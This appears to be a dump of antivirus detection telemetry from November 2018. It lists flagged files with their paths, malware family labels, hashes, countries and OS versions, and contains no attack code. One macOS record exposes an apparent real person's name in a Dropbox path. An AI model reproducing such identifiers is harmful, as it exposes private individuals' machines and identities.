  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:40:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='spnativemessage.exe', filepath='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\Surfing Protection\\SPNativeMessage.exe', filesize=1460000, name='W32/Neshta.A.#M1.#R1'), hash='fd862b80b8e984b8872cb4e0e7e7429551b1aab5f28c152edaa0beb4538628ba', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\WiseRegistryCleaner\\Activator.exe', parentsize=684032, timestamp='2018-11-04T22:15:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:52:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-202750-93df0c79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_94372a8a\\AVSCAN-20181101-202422-6FB24097\\AVSCAN-20181101-202750-93DF0C79', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091212-124f05ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ab2dd11\\AVSCAN-20181101-091141-0DC7349A\\AVSCAN-20181101-091212-124F05ED', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='f5712cd3636de516c2f73ce05ffdd34b663dcb28fa2a0e85d275d83d09e29f8c', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:12:25Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:10:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wvj9celk8.exe', filepath='C:\\Program Files\\WVJ9CELK8X\\WVJ9CELK8.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R4133'), hash='01b70e2e06a50fee1d5ce045d53f60d475ee26f638bfdbd3d3015f8cdba2b6e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:25:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-08-03-29.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-01T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T07:13:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080041-402ad2e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-080041-402AD2E0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='24250cc1fba06d785e4208efef9280bf81e5e5b7', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\24250cc1fba06d785e4208efef9280bf81e5e5b7', filesize=2112000, name='Adware/DealPly.06b94a.#M1.#R1'), hash='06b94ae0fb15a146e28d7b62f083d79de697c9c1d2806a4a7582d54423763e55', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:41:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T06:03:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155815-e1f19b77', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155815-E1F19B77', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:36:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-10-10-59.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T11:21:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6ef394ae1044c76635af953e313ccf2e791d16e5471a010cc68b5e00aeb33a2f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6EF394AE1044C76635AF953E313CCF2E791D16E5471A010CC68B5E00AEB33A2F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6ef394ae1044c76635af953e313ccf2e791d16e5471a010cc68b5e00aeb33a2f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:58:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T07:02:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\McAfee\\VirusScan Enterprise\\x64\\McShield.exe', parentsize=181480, timestamp='2018-11-02T02:48:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2e80d4e09ab2848696981ce3c00dab126a8084864368c0e3c5c9ebe9755c3e3d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2E80D4E09AB2848696981CE3C00DAB126A8084864368C0E3C5C9EBE9755C3E3D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2e80d4e09ab2848696981ce3c00dab126a8084864368c0e3c5c9ebe9755c3e3d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:45:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:17:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-121629-23c93508', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_67137dca\\AVSCAN-20181102-121614-21CC8359\\AVSCAN-20181102-121629-23C93508', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='4bb35ea756d240fbf25310581d51df02fca4299705c9e4abd48f0d2b601df2df', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:57:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1cb6df2bf5442042f20dfa273e9c2c75ac04dc98852235f9ccb77fd7eca3eddf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1CB6DF2BF5442042F20DFA273E9C2C75AC04DC98852235F9CCB77FD7ECA3EDDF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1cb6df2bf5442042f20dfa273e9c2c75ac04dc98852235f9ccb77fd7eca3eddf', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:18:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ae-ef03-e-psp2$项目进度计划(软件修订记录).xls', filepath='C:\\Users\\X\\Desktop\\AE-EF03-E-PSP2$项目进度计划(软件修订记录).xls', filesize=128000, name='X2000M/Agent.6489234.#M1.#R1'), hash='1899d4d9c91fcb27d40e5323532cda1136d9eb1526a5e0591d4ba733d9f3b624', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T06:29:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T23:46:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-00-43-28.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T00:33:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091830-c4b6531e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d948886c\\AVSCAN-20181102-091758-BFBA0904\\AVSCAN-20181102-091830-C4B6531E', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:18:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085902-72bb4f52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42b61ea2\\AVSCAN-20181102-085842-6F1BE58F\\AVSCAN-20181102-085902-72BB4F52', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:59:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bridgeunattend.exe', filepath='d:\\windows\\winsxs\\x86_microsoft-windows-networkbridge_31bf3856ad364e35_6.1.7600.16385_none_07c046fe67692e98\\bridgeunattend.exe', filesize=448000, name='W32/Virut.Gen.#M1.#R1'), hash='0c43551d72cdb2aa8869a64b1bf730debf55b7886990da8c03eca651bab50562', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:05:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184105-d8c138ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-184105-D8C138EC', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:41:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:42:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='blackstorm.dlr', filepath='C:\\Program Files\\Autodesk\\3ds Max Design 2014\\stdplugs\\BlackStorm.dlr', filesize=576000, name='TR/Crypt.XPACK.Gen.#M300.#R7269'), hash='24296f07b2db13327c95a6547a6c0d82387a8476158e8bf57a3931f68293d379', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Autodesk\\3ds Max Design 2014\\3dsmax.exe', parentsize=11076424, timestamp='2018-11-02T13:53:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120441-2b4143f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6cd8729\\AVSCAN-20181102-120406-257538A2\\AVSCAN-20181102-120441-2B4143F0', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zuma.exe', filepath='\\\\?\\E:\\العاب\\زوما\\ZUMA_DELUXE_V1.0_RUZO\\Zuma.exe', filesize=3328000, name='W32/Ramnit.C.#M1.#R1'), hash='2f142dd3ee42685279972e39f16f0ee1676f51a2bbd969efff0af3163ce7cdbb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T17:26:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_msoxh.zip\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T10:14:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055654-12257712', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055654-12257712', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143854-6408cd9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-143854-6408CD9B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:01Z'), dt=datetime.date(2018, 11, 2)),
